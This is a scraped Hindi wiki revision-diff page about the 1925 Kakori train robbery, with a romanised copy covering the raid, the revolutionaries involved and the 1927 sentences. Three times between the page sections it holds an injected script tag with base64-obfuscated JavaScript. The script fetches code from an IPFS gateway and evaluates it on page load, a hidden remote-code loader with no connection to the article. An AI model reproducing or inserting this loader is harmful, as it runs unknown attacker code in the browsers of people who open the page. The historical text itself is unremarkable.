Difference between revisions of "काकोरी काण्ड"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*[[उत्तर प्रदेश]] में [[लखनऊ]] के पास स्थित यह स्थान आधुनिक [[भारत]] में चर्चा का विषय बना। [[9 अगस्त]], [[1925]] को इस स्थान पर देशभक्तों ने रेल विभाग की ले जाई जा रही संगृहीत धनराशि को लूटा।  
+
[[उत्तर प्रदेश]] में [[लखनऊ]] के पास स्थित यह स्थान आधुनिक [[भारत]] में चर्चा का विषय बना। [[9 अगस्त]], [[1925]] को इस स्थान पर देशभक्तों ने रेल विभाग की ले जाई जा रही संगृहीत धनराशि को लूटा।  
 
*यह घटना इतिहास में '''काकोरी षड्यंत्र''' के नाम से जानी जाती है। क्रांतिकारी [[राम प्रसाद बिस्मिल]] के नेतृत्व में 10 लोगों ने सुनियोजित कार्रवाई के तहत यह कार्य करने की योजना बनाई। उन्होंने ट्रेन के गार्ड को बंदूक की नोक पर काबू कर लिया। गार्ड के डिब्बे में लोहे की तिज़ोरी को तोड़कर आक्रमणकारी दल चार हज़ार रुपये लेकर फरार हो गए।  
 
*यह घटना इतिहास में '''काकोरी षड्यंत्र''' के नाम से जानी जाती है। क्रांतिकारी [[राम प्रसाद बिस्मिल]] के नेतृत्व में 10 लोगों ने सुनियोजित कार्रवाई के तहत यह कार्य करने की योजना बनाई। उन्होंने ट्रेन के गार्ड को बंदूक की नोक पर काबू कर लिया। गार्ड के डिब्बे में लोहे की तिज़ोरी को तोड़कर आक्रमणकारी दल चार हज़ार रुपये लेकर फरार हो गए।  
*इस डकैती में [[अशफ़ाक़ उल्ला ख़ाँ|अशफाकउल्ला]], [[चन्द्रशेखर आज़ाद]], राजेन्द्र लाहिड़ी, सचीन्द्र सान्याल, मन्मथनाथ गुप्त, [[रामप्रसाद बिस्मिल]] आदि शामिल थे। काकोरी षड्यंत्र मुक़दमें ने काफ़ी लोगों का ध्यान खींचा। इसके कारण देश का राजनीतिक वातावरण आवेशित हो गया।  
+
*इस डकैती में [[अशफ़ाक़ उल्ला ख़ाँ|अशफाकउल्ला]], [[चन्द्रशेखर आज़ाद]], [[राजेन्द्रनाथ लाहिड़ी|राजेन्द्र लाहिड़ी]], सचीन्द्र सान्याल, [[मन्मथनाथ गुप्त]], [[रामप्रसाद बिस्मिल]] आदि शामिल थे। काकोरी षड्यंत्र मुक़दमें ने काफ़ी लोगों का ध्यान खींचा। इसके कारण देश का राजनीतिक वातावरण आवेशित हो गया।  
 
*इस घटना से जुड़े 43 अभियुक्तों पर मुक़दमा चलाया गया। निर्णय [[6 अप्रैल]], [[1927]] को सुनाया गया। रामप्रसाद बिस्मिल, राजेन्द्र लाहिड़ी और ठाकुर रोशनसिंह को मृत्युदण्ड की सज़ा सुनाई गई। सचीन्द्र सान्याल को आजीवन कारावास हुआ और मन्मथनाथ गुप्त को 14 वर्षों का सश्रम कारावास दिया गया। कुछ समय बाद अशफाकउल्ला को मृत्युदण्ड दिया गया। 14 अन्य लोगों को लम्बी सज़ा सुनाई गई। दो व्यक्ति अभियोजन पक्ष के मुखबिर बन गए। चन्द्रशेखर आज़ाद को पुलिस खोजती रही।  
 
*इस घटना से जुड़े 43 अभियुक्तों पर मुक़दमा चलाया गया। निर्णय [[6 अप्रैल]], [[1927]] को सुनाया गया। रामप्रसाद बिस्मिल, राजेन्द्र लाहिड़ी और ठाकुर रोशनसिंह को मृत्युदण्ड की सज़ा सुनाई गई। सचीन्द्र सान्याल को आजीवन कारावास हुआ और मन्मथनाथ गुप्त को 14 वर्षों का सश्रम कारावास दिया गया। कुछ समय बाद अशफाकउल्ला को मृत्युदण्ड दिया गया। 14 अन्य लोगों को लम्बी सज़ा सुनाई गई। दो व्यक्ति अभियोजन पक्ष के मुखबिर बन गए। चन्द्रशेखर आज़ाद को पुलिस खोजती रही।  
  

Revision as of 12:31, 14 July 2013

uttar pradesh mean lakhanoo ke pas sthit yah sthan adhunik bharat mean charcha ka vishay bana. 9 agast, 1925 ko is sthan par deshabhaktoan ne rel vibhag ki le jaee ja rahi sangrihit dhanarashi ko loota.

  • yah ghatana itihas mean kakori shadyantr ke nam se jani jati hai. kraantikari ram prasad bismil ke netritv mean 10 logoan ne suniyojit karravaee ke tahat yah kary karane ki yojana banaee. unhoanne tren ke gard ko bandook ki nok par kaboo kar liya. gard ke dibbe mean lohe ki tizori ko to dakar akramanakari dal char hazar rupaye lekar pharar ho ge.
  • is dakaiti mean ashaphakulla, chandrashekhar azad, rajendr lahi di, sachindr sanyal, manmathanath gupt, ramaprasad bismil adi shamil the. kakori shadyantr muqadamean ne kafi logoan ka dhyan khiancha. isake karan desh ka rajanitik vatavaran aveshit ho gaya.
  • is ghatana se ju de 43 abhiyuktoan par muqadama chalaya gaya. nirnay 6 aprail, 1927 ko sunaya gaya. ramaprasad bismil, rajendr lahi di aur thakur roshanasianh ko mrityudand ki saza sunaee gee. sachindr sanyal ko ajivan karavas hua aur manmathanath gupt ko 14 varshoan ka sashram karavas diya gaya. kuchh samay bad ashaphakulla ko mrityudand diya gaya. 14 any logoan ko lambi saza sunaee gee. do vyakti abhiyojan paksh ke mukhabir ban ge. chandrashekhar azad ko pulis khojati rahi.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>